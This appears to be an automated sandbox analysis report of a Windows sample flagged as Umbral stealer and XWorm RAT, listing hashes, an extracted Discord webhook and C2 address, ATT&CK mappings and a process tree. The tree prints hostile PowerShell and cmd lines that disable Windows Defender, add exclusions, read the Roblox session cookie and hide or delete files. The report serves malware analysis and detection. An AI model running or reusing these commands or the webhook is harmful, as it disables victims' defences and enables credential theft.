umbral | 02be84308541ec4d7614933e6a4985c8fdc7213ab873e7ca5c0aabfe5356e473

Analysis

max time kernel
127s
max time network
141s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
22-08-2024 23:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cum.exe
Size

7.2MB
MD5

e458411c85a5aea36d6314e286bafdbf
SHA1

750f15ec6e86e74ef852f7f43395145dbd873b98
SHA256

02be84308541ec4d7614933e6a4985c8fdc7213ab873e7ca5c0aabfe5356e473
SHA512

129083d7d8804ee46f8021895e162fdc0229ad5e75abeabb2b070036c1fc436f33a770d329f89c5d310b5e9ac1c91eace67e3782bda28fcc6fc800244dd07af2
SSDEEP

196608:tkpNA8RaKWfeYWBFrUpBfNNNAqvM4M+etNvdv:tkpNAGvHlSNhMH+oNV

Score

10^/10

umbral xworm credential_access discovery execution pyinstaller rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1276045605986107432/__jDxBNn4eIwDgfsF9Nvf_usMcbmRdQMO6KCi-9i1IoMGuWJto51uvjMtD8ys47YkqVM

Extracted

Family

xworm

10.9.92.54:80

Attributes

install_file
USB.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000900000001227c-5.dat	family_umbral
behavioral1/memory/664-7-0x0000000001270000-0x00000000012B0000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000018f08-19.dat	family_xworm
behavioral1/memory/2868-20-0x00000000010B0000-0x00000000010C8000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2084	powershell.exe
2952	powershell.exe
936	powershell.exe
2120	powershell.exe
1944	powershell.exe
1192	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	lol.exe

Executes dropped EXE 5 IoCs

pid	Process
664	lol.exe
2912	Genesis_Loader.exe
2868	obf.exe
2756	Main (1).exe
2664	Main (1).exe

Loads dropped DLL 2 IoCs

pid	Process
2912	Genesis_Loader.exe
2664	Main (1).exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
10	discord.com
11	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
7	ip-api.com

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0008000000018f13-23.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2124	cmd.exe
1572	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
752	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1572	PING.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2952	powershell.exe
2120	powershell.exe
1944	powershell.exe
936	powershell.exe
2460	powershell.exe
2084	powershell.exe
2868	obf.exe
1192	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	664	lol.exe
Token: SeDebugPrivilege	2868	obf.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	936	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	2868	obf.exe
Token: SeIncreaseQuotaPrivilege	1752	wmic.exe
Token: SeSecurityPrivilege	1752	wmic.exe
Token: SeTakeOwnershipPrivilege	1752	wmic.exe
Token: SeLoadDriverPrivilege	1752	wmic.exe
Token: SeSystemProfilePrivilege	1752	wmic.exe
Token: SeSystemtimePrivilege	1752	wmic.exe
Token: SeProfSingleProcessPrivilege	1752	wmic.exe
Token: SeIncBasePriorityPrivilege	1752	wmic.exe
Token: SeCreatePagefilePrivilege	1752	wmic.exe
Token: SeBackupPrivilege	1752	wmic.exe
Token: SeRestorePrivilege	1752	wmic.exe
Token: SeShutdownPrivilege	1752	wmic.exe
Token: SeDebugPrivilege	1752	wmic.exe
Token: SeSystemEnvironmentPrivilege	1752	wmic.exe
Token: SeRemoteShutdownPrivilege	1752	wmic.exe
Token: SeUndockPrivilege	1752	wmic.exe
Token: SeManageVolumePrivilege	1752	wmic.exe
Token: 33	1752	wmic.exe
Token: 34	1752	wmic.exe
Token: 35	1752	wmic.exe
Token: SeIncreaseQuotaPrivilege	1752	wmic.exe
Token: SeSecurityPrivilege	1752	wmic.exe
Token: SeTakeOwnershipPrivilege	1752	wmic.exe
Token: SeLoadDriverPrivilege	1752	wmic.exe
Token: SeSystemProfilePrivilege	1752	wmic.exe
Token: SeSystemtimePrivilege	1752	wmic.exe
Token: SeProfSingleProcessPrivilege	1752	wmic.exe
Token: SeIncBasePriorityPrivilege	1752	wmic.exe
Token: SeCreatePagefilePrivilege	1752	wmic.exe
Token: SeBackupPrivilege	1752	wmic.exe
Token: SeRestorePrivilege	1752	wmic.exe
Token: SeShutdownPrivilege	1752	wmic.exe
Token: SeDebugPrivilege	1752	wmic.exe
Token: SeSystemEnvironmentPrivilege	1752	wmic.exe
Token: SeRemoteShutdownPrivilege	1752	wmic.exe
Token: SeUndockPrivilege	1752	wmic.exe
Token: SeManageVolumePrivilege	1752	wmic.exe
Token: 33	1752	wmic.exe
Token: 34	1752	wmic.exe
Token: 35	1752	wmic.exe
Token: SeIncreaseQuotaPrivilege	2604	wmic.exe
Token: SeSecurityPrivilege	2604	wmic.exe
Token: SeTakeOwnershipPrivilege	2604	wmic.exe
Token: SeLoadDriverPrivilege	2604	wmic.exe
Token: SeSystemProfilePrivilege	2604	wmic.exe
Token: SeSystemtimePrivilege	2604	wmic.exe
Token: SeProfSingleProcessPrivilege	2604	wmic.exe
Token: SeIncBasePriorityPrivilege	2604	wmic.exe
Token: SeCreatePagefilePrivilege	2604	wmic.exe
Token: SeBackupPrivilege	2604	wmic.exe
Token: SeRestorePrivilege	2604	wmic.exe
Token: SeShutdownPrivilege	2604	wmic.exe
Token: SeDebugPrivilege	2604	wmic.exe
Token: SeSystemEnvironmentPrivilege	2604	wmic.exe
Token: SeRemoteShutdownPrivilege	2604	wmic.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2868	obf.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 2712 wrote to memory of 664	2712	cum.exe	29
PID 2712 wrote to memory of 664	2712	cum.exe	29
PID 2712 wrote to memory of 664	2712	cum.exe	29
PID 2712 wrote to memory of 2912	2712	cum.exe	30
PID 2712 wrote to memory of 2912	2712	cum.exe	30
PID 2712 wrote to memory of 2912	2712	cum.exe	30
PID 2912 wrote to memory of 2868	2912	Genesis_Loader.exe	31
PID 2912 wrote to memory of 2868	2912	Genesis_Loader.exe	31
PID 2912 wrote to memory of 2868	2912	Genesis_Loader.exe	31
PID 2912 wrote to memory of 2756	2912	Genesis_Loader.exe	32
PID 2912 wrote to memory of 2756	2912	Genesis_Loader.exe	32
PID 2912 wrote to memory of 2756	2912	Genesis_Loader.exe	32
PID 2756 wrote to memory of 2664	2756	Main (1).exe	34
PID 2756 wrote to memory of 2664	2756	Main (1).exe	34
PID 2756 wrote to memory of 2664	2756	Main (1).exe	34
PID 664 wrote to memory of 2692	664	lol.exe	36
PID 664 wrote to memory of 2692	664	lol.exe	36
PID 664 wrote to memory of 2692	664	lol.exe	36
PID 664 wrote to memory of 2952	664	lol.exe	38
PID 664 wrote to memory of 2952	664	lol.exe	38
PID 664 wrote to memory of 2952	664	lol.exe	38
PID 664 wrote to memory of 2120	664	lol.exe	40
PID 664 wrote to memory of 2120	664	lol.exe	40
PID 664 wrote to memory of 2120	664	lol.exe	40
PID 664 wrote to memory of 1944	664	lol.exe	42
PID 664 wrote to memory of 1944	664	lol.exe	42
PID 664 wrote to memory of 1944	664	lol.exe	42
PID 2868 wrote to memory of 936	2868	obf.exe	44
PID 2868 wrote to memory of 936	2868	obf.exe	44
PID 2868 wrote to memory of 936	2868	obf.exe	44
PID 664 wrote to memory of 2460	664	lol.exe	46
PID 664 wrote to memory of 2460	664	lol.exe	46
PID 664 wrote to memory of 2460	664	lol.exe	46
PID 2868 wrote to memory of 2084	2868	obf.exe	48
PID 2868 wrote to memory of 2084	2868	obf.exe	48
PID 2868 wrote to memory of 2084	2868	obf.exe	48
PID 664 wrote to memory of 1752	664	lol.exe	50
PID 664 wrote to memory of 1752	664	lol.exe	50
PID 664 wrote to memory of 1752	664	lol.exe	50
PID 664 wrote to memory of 2604	664	lol.exe	52
PID 664 wrote to memory of 2604	664	lol.exe	52
PID 664 wrote to memory of 2604	664	lol.exe	52
PID 664 wrote to memory of 948	664	lol.exe	54
PID 664 wrote to memory of 948	664	lol.exe	54
PID 664 wrote to memory of 948	664	lol.exe	54
PID 664 wrote to memory of 1192	664	lol.exe	56
PID 664 wrote to memory of 1192	664	lol.exe	56
PID 664 wrote to memory of 1192	664	lol.exe	56
PID 664 wrote to memory of 752	664	lol.exe	58
PID 664 wrote to memory of 752	664	lol.exe	58
PID 664 wrote to memory of 752	664	lol.exe	58
PID 664 wrote to memory of 2124	664	lol.exe	60
PID 664 wrote to memory of 2124	664	lol.exe	60
PID 664 wrote to memory of 2124	664	lol.exe	60
PID 2124 wrote to memory of 1572	2124	cmd.exe	62
PID 2124 wrote to memory of 1572	2124	cmd.exe	62
PID 2124 wrote to memory of 1572	2124	cmd.exe	62

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2692	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cum.exe
"C:\Users\Admin\AppData\Local\Temp\cum.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Users\Admin\AppData\Roaming\lol.exe
  "C:\Users\Admin\AppData\Roaming\lol.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:664
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\lol.exe"
    3⤵
    - Views/modifies file attributes
    PID:2692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\lol.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1752
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1192
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:752
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\lol.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:2124
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1572
- C:\Users\Admin\AppData\Roaming\Genesis_Loader.exe
  "C:\Users\Admin\AppData\Roaming\Genesis_Loader.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Users\Admin\AppData\Roaming\obf.exe
    "C:\Users\Admin\AppData\Roaming\obf.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\obf.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'obf.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2084
- - C:\Users\Admin\AppData\Roaming\Main (1).exe
    "C:\Users\Admin\AppData\Roaming\Main (1).exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Users\Admin\AppData\Roaming\Main (1).exe
      "C:\Users\Admin\AppData\Roaming\Main (1).exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI27562\python312.dll

Filesize
6.6MB

MD5
d521654d889666a0bc753320f071ef60

SHA1
5fd9b90c5d0527e53c199f94bad540c1e0985db6

SHA256
21700f0bad5769a1b61ea408dc0a140ffd0a356a774c6eb0cc70e574b929d2e2

SHA512
7a726835423a36de80fb29ef65dfe7150bd1567cac6f3569e24d9fe091496c807556d0150456429a3d1a6fd2ed0b8ae3128ea3b8674c97f42ce7c897719d2cd3

Download Submit
C:\Users\Admin\AppData\Roaming\Genesis_Loader.exe

Filesize
7.0MB

MD5
899a7de8d656ccb777f62ae16ee99ae9

SHA1
40ee23565d7d3d51f1abca51d1721c684f3955c2

SHA256
210a96f684b7cea559d755f27933d623beb50be519ace32a851bb9ac3ee8e44a

SHA512
b7bcb936d028cd6f61e074a57bbb7f2a62c1e974afa55c16f88a45b1a0c6cad1fd19f28cb63dfcb6d1cf1a107e6d6a33def79a1099023f2fde012963a087e3e8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
166c4054423cc1fb87425c4d8014bdcb

SHA1
cadccb892f4202af862951b4f8185e61bdbe4296

SHA256
dd37040ab8c7b912595d344c61ecb2c5857efcd1c4e7c4793eb571874650d094

SHA512
dcaad4825a0545aac9ed227fa47247414636504afa75e6157dc2a813b82c2a10c2911cebd16685d7ea623a835b4c7823667af92d323682802fc5abccf58d3535

Download Submit
C:\Users\Admin\AppData\Roaming\lol.exe

Filesize
229KB

MD5
ea031754ac9fe28dbc0c5915cb638e44

SHA1
14b2c7b94aefdfc911e26fc5deb6eb8b6d7c0aed

SHA256
cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e

SHA512
39a0790b3bae0862b1ba87bd6d1165694ba09cfa5104935e00ebaa13924699b2efba92ee6e744d3d820a9c05f80fa41fa1649498dce8f430835e8c6e813c25bb

Download Submit
C:\Users\Admin\AppData\Roaming\obf.exe

Filesize
72KB

MD5
5c2b1ec1c68b749d6a276addd31460d7

SHA1
0a370422c2c29aed0d16e8012545e21197d21821

SHA256
b486197aa0e45a64681e66d42a3041461f5a665d24010f36d7d78dfeec828d4b

SHA512
b7a2fdc569a8f423a9b9001ccb0e7376355b2e9b8bc6380805fe2ebd196371e11a0dd1a67ea2d01541b0495d4bfa692dcecb6911963fd1b0ce5831223d5a3595

Download Submit
\Users\Admin\AppData\Roaming\Main (1).exe

Filesize
6.9MB

MD5
376a81c9dbc8637ff9d12b382c7b5649

SHA1
52dc9915ce4f05054c7130c061683edd7b97978c

SHA256
94374b24ffd5dd3422890e362c8cd49c785b536d6148698b00cbcbcccc2eac75

SHA512
ce270e7dc43697bf98798f66f7c5a8724b75bee58cacf3a183f73d70785976425b8b518776060267f181fe1b7bfa4f36e1d47a7be81f9ee916f997c310ff7c05

Download Submit
memory/664-7-0x0000000001270000-0x00000000012B0000-memory.dmp

Filesize
256KB

Download
memory/664-16-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmp

Filesize
9.9MB

Download
memory/664-105-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmp

Filesize
9.9MB

Download
memory/664-96-0x000007FEF5580000-0x000007FEF5F6C000-memory.dmp

Filesize
9.9MB

Download
memory/2120-63-0x00000000024E0000-0x00000000024E8000-memory.dmp

Filesize
32KB

Download
memory/2120-62-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

Filesize
2.9MB

Download
memory/2712-0-0x000007FEF5583000-0x000007FEF5584000-memory.dmp

Filesize
4KB

Download
memory/2712-1-0x0000000000B70000-0x00000000012B0000-memory.dmp

Filesize
7.2MB

Download
memory/2868-20-0x00000000010B0000-0x00000000010C8000-memory.dmp

Filesize
96KB

Download
memory/2912-13-0x00000000000E0000-0x00000000007E4000-memory.dmp

Filesize
7.0MB

Download
memory/2952-46-0x0000000001E20000-0x0000000001E28000-memory.dmp

Filesize
32KB

Download
memory/2952-45-0x000000001B210000-0x000000001B4F2000-memory.dmp

Filesize
2.9MB

Download